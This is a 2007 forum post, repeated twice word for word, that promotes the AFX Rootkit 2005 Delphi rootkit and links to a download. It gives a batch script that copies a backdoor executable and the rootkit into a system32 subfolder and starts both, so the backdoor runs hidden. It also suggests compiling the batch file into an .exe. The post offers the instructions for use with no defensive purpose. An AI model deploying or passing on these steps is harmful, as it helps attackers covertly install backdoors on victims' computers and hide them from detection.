GODFATHER
06.06.2007, 14:55
-What is AFX Rootkit 2005 ?
This OPEN SOURCE Delphi rootkit uses code injection and hooks Windows native API to hide processes, modules, handles, files, ports, registry keys, etc.
-How to use ?
Create a .bat like this :
CODE
mkdir C:\windows\system32\kernel
copy server.exe C:\windows\system32\kernel\server.exe
copy root.exe C:\windows\system32\kernel\root.exe
start C:\windows\system32\kernel\root.exe /i
start C:\windows\system32\kernel\server.exe
where "server.exe" is the backdoor and the "root.exe" is the AFXRootkit executable.
When you will start the *.bat it will start the rootkit and then the backdoor.
Note:
you can convert the *.bat to an *.exe using BAT2EXE or Quick Batch File Compiler.
-Download AFXRootkit2005:
http://www.rootkit.com/vault/therealaphex/AFXRootkit2005.zip
This OPEN SOURCE Delphi rootkit uses code injection and hooks Windows native API to hide processes, modules, handles, files, ports, registry keys, etc.
-How to use ?
Create a .bat like this :
CODE
mkdir C:\windows\system32\kernel
copy server.exe C:\windows\system32\kernel\server.exe
copy root.exe C:\windows\system32\kernel\root.exe
start C:\windows\system32\kernel\root.exe /i
start C:\windows\system32\kernel\server.exe
where "server.exe" is the backdoor and the "root.exe" is the AFXRootkit executable.
When you will start the *.bat it will start the rootkit and then the backdoor.
Note:
you can convert the *.bat to an *.exe using BAT2EXE or Quick Batch File Compiler.
-Download AFXRootkit2005:
http://www.rootkit.com/vault/therealaphex/AFXRootkit2005.zip